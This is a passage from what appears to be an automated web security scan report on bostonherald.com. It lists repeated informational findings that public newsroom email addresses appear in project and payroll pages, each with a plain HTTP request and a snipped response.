21.66. http://www.bostonherald.com/projects/edic/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/edic/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/edic/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 97885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
<!-- // special_projects/ge
...[SNIP]...
<a href="mailto:newstips@bostonherald.com"><font color="#cc6600">newstips@bostonherald.com</a>
...[SNIP]...

21.67. http://www.bostonherald.com/projects/lawyer_pay/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/lawyer_pay/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/lawyer_pay/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 36347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
<!-- // special_projects/ge
...[SNIP]...
<a href="mailto:joed@bostonherald.com"><font color="#cc6600">
joed@bostonherald.com</font>
...[SNIP]...

21.68. http://www.bostonherald.com/projects/mta2008/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/mta2008/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/mta2008/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
<!-- // special_projects/ge
...[SNIP]...
<a href="mailto:joed@bostonherald.com"><font color="#cc6600">
joed@bostonherald.com</font>
...[SNIP]...

21.69. http://www.bostonherald.com/projects/payroll/brockton/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/brockton/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/payroll/brockton/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 29994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
<a href="mailto:joed@bostonherald.com">joed@bostonherald.com</a>
...[SNIP]...

21.70. http://www.bostonherald.com/projects/payroll/cambridge/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/cambridge/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/payroll/cambridge/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
<a href="mailto:joed@bostonherald.com">joed@bostonherald.com</a>
...[SNIP]...

21.71. http://www.bostonherald.com/projects/payroll/cca/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/cca/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/payroll/cca/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 27984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
<a href="mailto:joed@bostonherald.com">joed@bostonherald.com</a>
...[SNIP]...

21.72. http://www.bostonherald.com/projects/payroll/mass_pike/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/mass_pike/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/payroll/mass_pike/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
<a href="mailto:joed@bostonherald.com"><font color="#cc6600">joed@bostonherald.com</a>
...[SNIP]...

21.73. http://www.bostonherald.com/projects/payroll/quasi_state/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quasi_state/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/payroll/quasi_state/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
<!-- // special_projects/ge
...[SNIP]...
<a href="mailto:newstips@bostonherald.com">newstips@bostonherald.com</a>
...[SNIP]...

21.74. http://www.bostonherald.com/projects/payroll/quincy/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quincy/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/payroll/quincy/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
<a href="mailto:joed@bostonherald.com">joed@bostonherald.com</a>
...[SNIP]...

21.75. http://www.bostonherald.com/projects/payroll/springfield/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/springfield/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/payroll/springfield/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
<a href="mailto:joed@bostonherald.com"><font color="#cc6600">joed@bostonherald.com</a>
...[SNIP]...

21.76. http://www.bostonherald.com/projects/payroll/suffolk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/suffolk/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/payroll/suffolk/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
<a href="mailto:joed@bostonherald.com">joed@bostonherald.com</a>
...[SNIP]...

21.77. http://www.bostonherald.com/projects/payroll/worcester/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/worcester/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/payroll/worcester/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 29700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
<a href="mailto:joed@bostonherald.com">joed@bostonherald.com</a>
...[SNIP]...

21.78. http://www.bostonherald.com/projects/your_tax_dollars.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/your_tax_dollars.bg

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/your_tax_dollars.bg?src=Mwra HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<a href="mailto:joed@bostonherald.com">joed@bostonherald.com</a>
...[SNIP]...

21.79. http://www.bostonherald.com/projects/your_tax_dollars.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/your_tax_dollars.bg

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/your_tax_dollars.bg HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
